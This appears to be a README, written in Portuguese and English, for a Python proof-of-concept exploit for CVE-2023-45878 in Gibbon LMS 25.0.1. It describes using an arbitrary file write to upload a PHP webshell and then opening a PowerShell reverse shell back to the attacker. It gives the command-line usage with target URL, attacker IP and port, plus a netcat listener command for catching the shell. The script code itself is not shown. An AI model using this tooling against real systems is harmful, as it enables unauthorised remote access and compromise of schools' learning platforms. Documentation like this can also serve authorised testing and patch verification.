
Exploração em Python para CVE-2023-45878 visando Gibbon LMS 25.0.1. Usa escrita arbitrária de arquivos para enviar um webshell PHP e executar um shell reverso PowerShell para acesso remoto.
Escrevi este script baseado no trabalho de https://herolab.usd.de/security-advisories/usd-2023-0025/ . O exploit funciona usando uma exploração de Gravação Arbitrária de Arquivos no Gibbon LMS 25.0.1. Este PoC fará upload de um script php cmd simples e, em seguida, o usará para carregar um revshell do PowerShell.
python3 CVE-2023-45878.py -u http://target.com/Gibbon-LMS -l 10.10.16.2 -p 8888 -f asdf
Flags:
-u, URL where Gibbon LMS is installed.
-l, your IP
-p, your open port
-f, filename. Important if you need to manually test. Default is "asdf".
Tenha um listener pronto para a shell recebida.
nc -lvnp 8888